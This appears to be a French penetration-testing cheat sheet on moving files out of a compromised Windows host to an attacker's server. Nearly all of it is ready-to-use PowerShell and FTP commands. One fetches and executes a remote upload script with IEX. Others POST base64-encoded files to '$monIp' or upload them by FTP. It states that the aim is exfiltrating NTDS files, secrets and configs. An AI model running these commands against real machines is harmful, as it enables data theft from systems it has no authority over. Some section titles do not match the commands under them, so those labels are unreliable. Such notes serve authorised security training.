Uploader depuis Windows
Techniques pour uploader un fichier depuis une machine Windows compromise vers un serveur attaquant : encodage base64 via PowerShell, Invoke-WebRequest, montage SMB, ou utilisation d'outils natifs comme certutil. Pratique pour exfiltrer des fichiers sensibles (NTDS, secrets, configs).
Upload d'un fichier depuis windows en base64¶
Upload d'un fichier via création d'un serveur d'upload¶
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Invoke-FileUpload -Uri http://$monIp:8000/upload -File $fichier
Upload d'un fichier en base64 via netcat¶
$b64 = [System.convert]::ToBase64String((Get-Content -Path '$fichier' -Encoding Byte))
Invoke-WebRequest -Uri http://$monIp:8000/ -Method POST -Body $b64
Upload d'un fichier via création d'un serveur FTP¶
(New-Object Net.WebClient).UploadFile('ftp://$monIp/ftp-hosts', '$fichier')
Ou, en cas de shell non-interractif:
echo open $monIp > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo PUT $fichier >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt